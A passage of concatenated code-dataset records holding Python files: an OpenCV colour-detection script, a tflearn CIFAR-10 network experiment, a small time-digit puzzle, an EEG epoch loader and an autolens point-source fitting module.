cv2.imshow(\"frame\", frame)\r\n cv2.imshow(\"mask\", mask)\r\n cv2.imshow(\"res\", res)\r\n\r\n\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncv2.destroyAllWindows()\r\n# 
cap.release()\r\n\r\n\r\n# img = cv2.imread('lena.jpg',1)\r\n\r\n# cv2.imshow('image',img)\r\n# k = cv2.waitKey(0)\r\n# if k == 27:\r\n# cv2.destroyAllWindows()\r\n# elif k == ord('s'):\r\n# cv2.imwrite('lena_copy.png', img)\r\n\r\n\r\n# img = cv2.imread('lena.jpg',1)\r\n# img = cv2.line(img,(0,0),(500,700),(255,255,0), 1)\r\n# img = cv2.arrowedLine(img,(0,255),(100,100),(255,255,0), 2)\r\n# img = cv2.rectangle(img, (50,0), (100,128), (255,0,0),5)\r\n# cv2.imshow('image', img)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\n\r\n\r\n#flag 1 is color\r\n#flag 0 is greyscale\r\n#flag -1 including alpha channel\r\n\r\n\r\n# this is a video capture\r\n# cap = cv2.VideoCapture(0)\r\n# fourcc = cv2.VideoWriter_fourcc(*'XVID')\r\n# out = cv2.VideoWriter('output.avi', fourcc,20.0,(640,480))\r\n\r\n# while(cap.isOpened()):\r\n# ret, frame = cap.read()\r\n# if ret == True:\r\n# print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n# print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n# out.write(frame)\r\n\r\n# gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n# cv2.imshow('video',gray)\r\n\r\n# if cv2.waitKey(1) & 0xFF == ord('q'):\r\n# break\r\n# else:\r\n# break\r\n\r\n# cap.release()\r\n# out.release()\r\n# cv2.destroyAllWindows()\r\n\r\n\r\n# read image\r\n\r\n", "sub_path": "OpenCVProject/colorDetection.py", "file_name": "colorDetection.py", "file_ext": "py", "file_size_in_byte": 2473, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.getTrackbarPos", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "11569532", "text": "# -*- coding: utf-8 -*-\n\n\"\"\" Deep Residual Network.\nApplying a Deep Residual 
Network to CIFAR-10 Dataset classification task.\nReferences:\n    - K. He, X. Zhang, S. Ren, and J. Sun. Deep Residual Learning for Image\n      Recognition, 2015.\n    - Learning Multiple Layers of Features from Tiny Images, A. Krizhevsky, 2009.\nLinks:\n    - [Deep Residual Network](http://arxiv.org/pdf/1512.03385.pdf)\n    - [CIFAR-10 Dataset](https://www.cs.toronto.edu/~kriz/cifar.html)\n\"\"\"\n\nfrom __future__ import division, print_function, absolute_import\n\nimport tflearn\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser(description='ResNet.')\nparser.add_argument('-n', metavar='--nBlocks',nargs=1,type=int,required=True,\n                    help='Parameter n as in the paper. #layers = 2 + (6n)')\nparser.add_argument('-e', metavar='--nBlocks',nargs=1,type=int,required=True,\n                    help='Number of epochs')\nparser.add_argument('-a', metavar='--act',nargs=4,type=str,required=False,\n                    help='Activation configuration')\n\nparser.add_argument('-exp', metavar='--experimento',nargs=2,type=str,required=False,\n                    help='Experiment id and activation function to apply')\n\nparser.add_argument('-b', metavar='--block-mode',nargs=1,type=str,required=False,\n                    help='Block mode: REFERENCE, BN_AA or NO_RELU')\n\nparser.add_argument('-suf2', metavar='--suffix2',nargs=1,type=str,required=False,\n                    help='Suffix 2 appended to the model name')\n\nargs = vars(parser.parse_args())\n\n# Residual blocks\n# 20 layers: n=3\n# 32 layers: n=5,\n# 44 layers: n=7,\n# 56 layers: n=9,\n# 110 layers: n=18\nexperimentos = {\n    'default':['relu','relu','relu','relu'],\n    'E1':[None,None,None,None],\n    'E2':[None,None,'relu','relu'],\n    'E3':['relu','relu',None,None],\n    'E4':[None,'relu','relu','relu'],\n    'E5':[None,'relu',None,None],\n    'E6':['relu',None,None,None]\n}\nn = args['n'][0]\nEPOCHS=args['e'][0]\nactivations = args['a']\nexperimento = args['exp']\n\nsuffix2 = args['suf2']\n\n\nif args['b'] == None:\n    block_mode = 'reference'\nelse:\n    block_mode = args['b'][0]\n\nif block_mode.upper() == 'REFERENCE':\n    bn_position = 'before'\n    last_actv = True\nelif block_mode.upper() == 'BN_AA':\n    bn_position = 'after'\n    last_actv = True\nelif block_mode.upper() == 'NO_RELU':\n    bn_position = 'before'\n    last_actv = False\n\nif experimento != None:\n    id_exp = experimento[0]\n    activ_fn = experimento[1]\n    activations = experimentos[id_exp]\n    activations = [activ_fn if v is None else v for v in activations]\n    suffix = id_exp+'_'+activ_fn\nelif activations == None:\n    activations = experimentos['default']\n    suffix = 'default'\nelse:\n    suffix = 'acts='+'_'.join(activations)\n\nlayers = (n*6)+2\n\n# Data loading\nfrom tflearn.datasets import cifar10\nfrom modulos import my_plain_block\n\n\n(X, Y), (testX, testY) = cifar10.load_data()\nY = tflearn.data_utils.to_categorical(Y,nb_classes=10)\ntestY = tflearn.data_utils.to_categorical(testY,nb_classes=10)\n\n# Real-time data preprocessing\nimg_prep = tflearn.ImagePreprocessing()\nimg_prep.add_featurewise_zero_center(per_channel=True)\n\n# Real-time data augmentation\nimg_aug = tflearn.ImageAugmentation()\nimg_aug.add_random_flip_leftright()\nimg_aug.add_random_crop([32, 32], padding=4)\n\n# Building Residual Network\nnet = tflearn.input_data(shape=[None, 32, 32, 3],\n                         data_preprocessing=img_prep,\n                         data_augmentation=img_aug)\nnet = tflearn.conv_2d(net, 16, 3, regularizer='L2', weight_decay=0.0001)\nnet = tflearn.batch_normalization(net)\nnet = tflearn.activation(net,activation=activations[0])\nnet = my_plain_block(net, n, 16,activation=activations[1],bn_position=bn_position,last_actv=last_actv)\nnet = 
my_plain_block(net, 1, 32, downsample=True,activation=activations[2],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, n-1, 32,activation=activations[2],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, 1, 64, downsample=True,activation=activations[3],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, n-1, 64,activation=activations[3],bn_position=bn_position,last_actv=last_actv)\nnet = tflearn.global_avg_pool(net)\n# Regression\nnet = tflearn.fully_connected(net, 10, activation='softmax')\nmom = tflearn.Momentum(0.1, lr_decay=0.1, decay_step=32000, staircase=True)\nnet = tflearn.regression(net, optimizer=mom,\n loss='categorical_crossentropy')\n# Training\nmodel = tflearn.DNN(net, checkpoint_path='./checkpoints/', tensorboard_verbose=0,tensorboard_dir='log',\n clip_gradients=0.)\n\n\nmodel_name = 'PLAIN_'+str(layers)+'_layers_'+str(EPOCHS)+'_epochs_BM='+block_mode+'_'+suffix\n\nif suffix2 != None:\n model_name = model_name +'_'+suffix2[0]\n\nmodel.fit(X, Y, n_epoch=EPOCHS, validation_set=(testX, testY),\n snapshot_epoch=True,\n show_metric=True, batch_size=128, shuffle=True,\n run_id='resnet_cifar10_'+model_name)\n\nmodel.save('./models_trained/resnet_cifar10_'+model_name+'_model')", "sub_path": "Experiments_PlainNet.py", "file_name": "Experiments_PlainNet.py", "file_ext": "py", "file_size_in_byte": 5073, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "tflearn.datasets.cifar10.load_data", "line_number": 96, "usage_type": "call"}, {"api_name": "tflearn.datasets.cifar10", "line_number": 96, "usage_type": "name"}, {"api_name": "tflearn.data_utils.to_categorical", "line_number": 97, "usage_type": "call"}, {"api_name": "tflearn.data_utils", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils.to_categorical", "line_number": 98, "usage_type": "call"}, {"api_name": "tflearn.data_utils", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tflearn.ImagePreprocessing", "line_number": 101, "usage_type": "call"}, {"api_name": "tflearn.ImageAugmentation", "line_number": 105, "usage_type": "call"}, {"api_name": "tflearn.input_data", "line_number": 110, "usage_type": "call"}, {"api_name": "tflearn.conv_2d", "line_number": 113, "usage_type": "call"}, {"api_name": "tflearn.batch_normalization", "line_number": 114, "usage_type": "call"}, {"api_name": "tflearn.activation", "line_number": 115, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 116, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 117, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 118, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 119, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 120, "usage_type": "call"}, {"api_name": "tflearn.global_avg_pool", "line_number": 121, "usage_type": "call"}, {"api_name": "tflearn.fully_connected", "line_number": 123, "usage_type": "call"}, {"api_name": "tflearn.Momentum", "line_number": 124, "usage_type": "call"}, {"api_name": "tflearn.regression", "line_number": 125, "usage_type": "call"}, {"api_name": "tflearn.DNN", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "264927786", "text": "def lateRide(n):\n import datetime\n \n starttime = datetime.time(0)\n \n curtime = datetime.timedelta(minutes=n) #get 
the current time\n    curtime = str(curtime).split(\":\") #cast the current time as a string, split by hh:mm:ss\n    string = ''.join(curtime) #join the items as one string\n    return sum([int(digit) for digit in str(string)])\n    \n", "sub_path": "Intro Gates/Late Ride.py", "file_name": "Late Ride.py", "file_ext": "py", "file_size_in_byte": 358, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.time", "line_number": 4, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "176820001", "text": "from pathlib import Path\nimport os\nimport numpy as np\nimport mne\nimport pandas as pd\n\n# get the data path (not sure this works)\nfrom data import datafolder\n# get the list function\n\nimport data.eeg\nfrom functools import partial\n\nftype = 'raw'\ntasktype = 'Video'\n\n\n# make the generators partial functions\ndef raws():\n    for raw in data.eeg.raws(ftype, tasktype):\n        if len(raw) > 1:\n            yield raw\n        elif len(raw) == 1:\n            yield raw[0]\n\n\ndef events():\n    for event in data.eeg.events(ftype, tasktype):\n        if len(event) > 1:\n            yield event\n        elif len(event) == 1:\n            yield event[0]\n\n\n# for the epochs, make a slightly more elaborate function that\n# fixes the event types and the duration\ndef epochs(**kwargs):\n\n    for rawlist, eventlist in zip(\n            data.eeg.raws(ftype, tasktype),\n            data.eeg.events(ftype, tasktype)):\n        pid = rawlist[0].info['subject_info']\n        epochlist = []\n        for raw, event in zip(rawlist, eventlist):\n            duration = ((event[0, (event[:, 2] > 100) & (event[:, 2] < 110)] -\n                         event[0, (event[:, 2] > 80) & (event[:, 2] < 90)]) /\n                        raw.info['sfreq'])[0]\n\n            epochlist.append(mne.Epochs(raw, event, event_id=[81, 82, 83, 84],\n                                        tmax=duration, on_missing='ignore',\n                                        **kwargs))\n\n        yield mne.concatenate_epochs(epochlist)\n", "sub_path": "{{cookiecutter.project_slug}}/data/eeg/raw/video.py", "file_name": "video.py", "file_ext": "py", "file_size_in_byte": 1467, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "data.eeg.raws", "line_number": 20, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 20, "usage_type": "attribute"}, {"api_name": "data.eeg.events", "line_number": 28, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 28, "usage_type": "attribute"}, {"api_name": "data.eeg.raws", "line_number": 40, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 40, "usage_type": "attribute"}, {"api_name": "data.eeg.events", "line_number": 41, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 41, "usage_type": "attribute"}, {"api_name": "mne.Epochs", "line_number": 49, "usage_type": "call"}, {"api_name": "mne.concatenate_epochs", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "385384684", "text": "from functools import partial\r\nimport numba\r\nfrom typing import Optional\r\n\r\nimport autoarray as aa\r\nimport autogalaxy as ag\r\n\r\nfrom autolens.point.point_dataset import PointDict\r\nfrom autolens.point.point_dataset import PointDataset\r\nfrom autolens.point.point_solver import PointSolver\r\nfrom autolens.lens.ray_tracing import Tracer\r\n\r\nfrom autolens import exc\r\n\r\n\r\nclass FitPointDict(dict):\r\n    def __init__(\r\n        self, point_dict: PointDict, tracer: Tracer, point_solver: PointSolver\r\n    ):\r\n        \"\"\"\r\n        A fit to a point source dataset, which is stored as a dictionary containing the fit of every data point in an\r\n        entire 
point-source dataset dictionary.\r\n\r\n This dictionary uses the `name` of the `PointDataset` to act as the key of every entry of the dictionary,\r\n making it straight forward to access the attributes based on the dataset name.\r\n\r\n Parameters\r\n ----------\r\n point_dict\r\n A dictionary of all point-source datasets that are to be fitted.\r\n\r\n Returns\r\n -------\r\n Dict\r\n A dictionary where the keys are the `name` entries of each dataset in the `PointDict` and the values\r\n are the corresponding fits to the `PointDataset` it contained.\r\n \"\"\"\r\n\r\n self.tracer = tracer\r\n\r\n super().__init__()\r\n\r\n for key, point_dataset in point_dict.items():\r\n\r\n self[key] = FitPointDataset(\r\n point_dataset=point_dataset, tracer=tracer, point_solver=point_solver\r\n )\r\n\r\n @property\r\n def log_likelihood(self) -> float:\r\n return sum(fit.log_likelihood for fit in self.values())\r\n\r\n\r\nclass FitPointDataset:\r\n def __init__(\r\n self, point_dataset: PointDataset, tracer: Tracer, point_solver: PointSolver\r\n ):\r\n\r\n self.point_dataset = point_dataset\r\n\r\n point_profile = tracer.extract_profile(profile_name=point_dataset.name)\r\n\r\n try:\r\n\r\n if isinstance(point_profile, ag.ps.PointSourceChi):\r\n\r\n self.positions = FitPositionsSource(\r\n name=point_dataset.name,\r\n positions=point_dataset.positions,\r\n noise_map=point_dataset.positions_noise_map,\r\n tracer=tracer,\r\n point_profile=point_profile,\r\n )\r\n\r\n else:\r\n\r\n self.positions = FitPositionsImage(\r\n name=point_dataset.name,\r\n positions=point_dataset.positions,\r\n noise_map=point_dataset.positions_noise_map,\r\n point_solver=point_solver,\r\n tracer=tracer,\r\n point_profile=point_profile,\r\n )\r\n\r\n except exc.PointExtractionException:\r\n self.positions = None\r\n except (AttributeError, numba.errors.TypingError) as e:\r\n raise exc.FitException from e\r\n\r\n try:\r\n\r\n self.flux = FitFluxes(\r\n name=point_dataset.name,\r\n fluxes=point_dataset.fluxes,\r\n noise_map=point_dataset.fluxes_noise_map,\r\n positions=point_dataset.positions,\r\n tracer=tracer,\r\n )\r\n\r\n except exc.PointExtractionException:\r\n\r\n self.flux = None\r\n\r\n @property\r\n def log_likelihood(self) -> float:\r\n\r\n log_likelihood_positions = (\r\n self.positions.log_likelihood if self.positions is not None else 0.0\r\n )\r\n log_likelihood_flux = self.flux.log_likelihood if self.flux is not None else 0.0\r\n\r\n return log_likelihood_positions + log_likelihood_flux\r\n\r\n\r\nclass FitPositionsImage(aa.FitData):\r\n def __init__(\r\n self,\r\n name: str,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n tracer: Tracer,\r\n point_solver: PointSolver,\r\n point_profile: Optional[ag.ps.Point] = None,\r\n ):\r\n \"\"\"\r\n A lens position fitter, which takes a set of positions (e.g. 
from a plane in the tracer) and computes \\\r\n their maximum separation, such that points which tracer closer to one another have a higher log_likelihood.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of positions which the maximum distance and log_likelihood is computed using.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n\r\n self.name = name\r\n\r\n if point_profile is None:\r\n point_profile = tracer.extract_profile(profile_name=name)\r\n\r\n self.point_profile = point_profile\r\n\r\n self.point_solver = point_solver\r\n\r\n if self.point_profile is None:\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} there was no matching point source profile \"\r\n f\"in the tracer (make sure your tracer's point source name is the same the dataset name.\"\r\n )\r\n\r\n self.source_plane_coordinate = self.point_profile.centre\r\n\r\n if len(tracer.planes) > 2:\r\n upper_plane_index = tracer.extract_plane_index_of_profile(profile_name=name)\r\n else:\r\n upper_plane_index = None\r\n\r\n model_positions = point_solver.solve(\r\n lensing_obj=tracer,\r\n source_plane_coordinate=self.source_plane_coordinate,\r\n upper_plane_index=upper_plane_index,\r\n )\r\n\r\n model_positions = model_positions.grid_of_closest_from(grid_pair=positions)\r\n\r\n super().__init__(\r\n data=positions,\r\n noise_map=noise_map,\r\n model_data=model_positions,\r\n mask=None,\r\n inversion=None,\r\n )\r\n\r\n @property\r\n def positions(self) -> aa.Grid2DIrregular:\r\n return self.data\r\n\r\n @property\r\n def model_positions(self) -> aa.Grid2DIrregular:\r\n return self.model_data\r\n\r\n @property\r\n def residual_map(self) -> aa.ValuesIrregular:\r\n\r\n residual_positions = self.positions - self.model_positions\r\n\r\n return residual_positions.distances_to_coordinate(coordinate=(0.0, 0.0))\r\n\r\n\r\nclass FitPositionsSource(aa.FitData):\r\n def __init__(\r\n self,\r\n name: str,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n tracer: Tracer,\r\n point_profile: Optional[ag.ps.Point] = None,\r\n ):\r\n \"\"\"\r\n A lens position fitter, which takes a set of positions (e.g. 
from a plane in the tracer) and computes \\\r\n their maximum separation, such that points which tracer closer to one another have a higher log_likelihood.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of positions which the maximum distance and log_likelihood is computed using.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n\r\n self.name = name\r\n\r\n if point_profile is None:\r\n point_profile = tracer.extract_profile(profile_name=name)\r\n\r\n self.point_profile = point_profile\r\n\r\n if self.point_profile is None:\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} there was no matching point source profile \"\r\n f\"in the tracer (make sure your tracer's point source name is the same the dataset name.\"\r\n )\r\n\r\n self.source_plane_coordinate = self.point_profile.centre\r\n\r\n if len(tracer.planes) <= 2:\r\n\r\n deflections = tracer.deflections_yx_2d_from(grid=positions)\r\n\r\n else:\r\n\r\n upper_plane_index = tracer.extract_plane_index_of_profile(profile_name=name)\r\n\r\n deflections = tracer.deflections_between_planes_from(\r\n grid=positions, plane_i=0, plane_j=upper_plane_index\r\n )\r\n\r\n model_positions = positions.grid_via_deflection_grid_from(\r\n deflection_grid=deflections\r\n )\r\n\r\n super().__init__(\r\n data=positions,\r\n noise_map=noise_map,\r\n model_data=model_positions,\r\n mask=None,\r\n inversion=None,\r\n )\r\n\r\n @property\r\n def positions(self) -> aa.Grid2DIrregular:\r\n return self.data\r\n\r\n @property\r\n def model_positions(self) -> aa.Grid2DIrregular:\r\n return self.model_data\r\n\r\n @property\r\n def residual_map(self) -> aa.ValuesIrregular:\r\n\r\n return self.model_positions.distances_to_coordinate(\r\n coordinate=self.source_plane_coordinate\r\n )\r\n\r\n\r\nclass FitFluxes(aa.FitData):\r\n def __init__(\r\n self,\r\n name: str,\r\n fluxes: aa.ValuesIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n positions: aa.Grid2DIrregular,\r\n tracer: Tracer,\r\n point_profile: Optional[ag.ps.Point] = None,\r\n ):\r\n\r\n self.tracer = tracer\r\n\r\n self.name = name\r\n self.positions = positions\r\n\r\n if point_profile is None:\r\n point_profile = tracer.extract_profile(profile_name=name)\r\n\r\n self.point_profile = point_profile\r\n\r\n if self.point_profile is None:\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} there was no matching point source profile \"\r\n f\"in the tracer (make sure your tracer's point source name is the same the dataset name.\"\r\n )\r\n\r\n elif not hasattr(self.point_profile, \"flux\"):\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} the extracted point source was the \"\r\n f\"class {self.point_profile.__class__.__name__} and therefore does \"\r\n f\"not contain a flux component.\"\r\n )\r\n\r\n if len(tracer.planes) > 2:\r\n upper_plane_index = tracer.extract_plane_index_of_profile(profile_name=name)\r\n deflections_func = partial(\r\n tracer.deflections_between_planes_from,\r\n plane_i=0,\r\n plane_j=upper_plane_index,\r\n )\r\n else:\r\n deflections_func = tracer.deflections_yx_2d_from\r\n\r\n self.magnifications = abs(\r\n self.tracer.magnification_2d_via_hessian_from(\r\n grid=positions, deflections_func=deflections_func\r\n )\r\n )\r\n\r\n model_fluxes = aa.ValuesIrregular(\r\n values=[\r\n magnification * self.point_profile.flux\r\n for magnification in self.magnifications\r\n ]\r\n )\r\n\r\n 
super().__init__(\r\n data=fluxes,\r\n noise_map=noise_map,\r\n model_data=model_fluxes,\r\n mask=None,\r\n inversion=None,\r\n )\r\n\r\n @property\r\n def fluxes(self) -> aa.ValuesIrregular:\r\n return self.data\r\n\r\n @property\r\n def model_fluxes(self) -> aa.ValuesIrregular:\r\n return self.model_data\r\n\r\n\r\nclass AbstractFitPositionsSourcePlane:\r\n def __init__(\r\n self,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n tracer: Tracer,\r\n ):\r\n \"\"\"\r\n Given a positions dataset, which is a list of positions with names that associated them to model source\r\n galaxies, use a `Tracer` to determine the traced coordinate positions in the source-plane.\r\n\r\n Different children of this abstract class are available which use the traced coordinates to define a chi-squared\r\n value in different ways.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of named positions which the log_likelihood is computed using. Positions\r\n are paired to galaxies in the `Tracer` using their names.\r\n tracer : Tracer\r\n The object that defines the ray-tracing of the strong lens system of galaxies.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n self.positions = positions\r\n self.noise_map = noise_map\r\n self.source_plane_positions = tracer.traced_grid_list_from(grid=positions)[-1]\r\n\r\n @property\r\n def furthest_separations_of_source_plane_positions(self) -> aa.ValuesIrregular:\r\n \"\"\"\r\n Returns the furthest distance of every source-plane (y,x) coordinate to the other source-plane (y,x)\r\n coordinates.\r\n\r\n For example, for the following source-plane positions:\r\n\r\n source_plane_positions = [[(0.0, 0.0), (0.0, 1.0), (0.0, 3.0)]\r\n\r\n The returned furthest distances are:\r\n\r\n source_plane_positions = [3.0, 2.0, 3.0]\r\n\r\n Returns\r\n -------\r\n aa.ValuesIrregular\r\n The further distances of every set of grouped source-plane coordinates the other source-plane coordinates\r\n that it is grouped with.\r\n \"\"\"\r\n return self.source_plane_positions.furthest_distances_to_other_coordinates\r\n\r\n @property\r\n def max_separation_of_source_plane_positions(self) -> float:\r\n return max(self.furthest_separations_of_source_plane_positions)\r\n\r\n def max_separation_within_threshold(self, threshold) -> bool:\r\n return self.max_separation_of_source_plane_positions <= threshold\r\n\r\n\r\nclass FitPositionsSourceMaxSeparation(AbstractFitPositionsSourcePlane):\r\n def __init__(\r\n self,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: Optional[aa.ValuesIrregular],\r\n tracer: Tracer,\r\n ):\r\n \"\"\"A lens position fitter, which takes a set of positions (e.g. 
from a plane in the tracer) and computes \\\r\n their maximum separation, such that points which tracer closer to one another have a higher log_likelihood.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of positions which the maximum distance and log_likelihood is computed using.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n super().__init__(positions=positions, noise_map=noise_map, tracer=tracer)\r\n", "sub_path": "autolens/point/fit_point.py", "file_name": "fit_point.py", "file_ext": "py", "file_size_in_byte": 14233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "autolens.point.point_dataset.PointDict", "line_number": 18, "usage_type": "name"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 18, "usage_type": "name"}, {"api_name": "autolens.point.point_solver.PointSolver", "line_number": 18, "usage_type": "name"}, {"api_name": "autolens.point.point_dataset.PointDataset", "line_number": 56, "usage_type": "name"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 56, "usage_type": "name"}, {"api_name": "autolens.point.point_solver.PointSolver", "line_number": 56, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 65, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 86, "usage_type": "attribute"}, {"api_name": "autolens.exc", "line_number": 86, "usage_type": "name"}, {"api_name": "numba.errors", "line_number": 88, "usage_type": "attribute"}, {"api_name": "autolens.exc.FitException", "line_number": 89, "usage_type": "attribute"}, {"api_name": "autolens.exc", "line_number": 89, "usage_type": "name"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 101, "usage_type": "attribute"}, {"api_name": "autolens.exc", "line_number": 101, "usage_type": "name"}, {"api_name": "autoarray.FitData", "line_number": 116, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 120, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 121, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 122, "usage_type": "name"}, {"api_name": "autolens.point.point_solver.PointSolver", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 124, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 124, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 148, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 148, "usage_type": "name"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 177, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 181, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 185, "usage_type": "attribute"}, {"api_name": "autoarray.FitData", "line_number": 192, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 196, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 197, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 198, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 199, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 199, "usage_type": "attribute"}, {"api_name": 
"autolens.exc.PointExtractionException", "line_number": 221, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 221, "usage_type": "name"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 253, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 257, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 261, "usage_type": "attribute"}, {"api_name": "autoarray.FitData", "line_number": 268, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 272, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 273, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 274, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 275, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 276, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 276, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 290, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 290, "usage_type": "name"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 296, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 296, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 304, "usage_type": "call"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 318, "usage_type": "call"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 334, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 338, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 345, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", 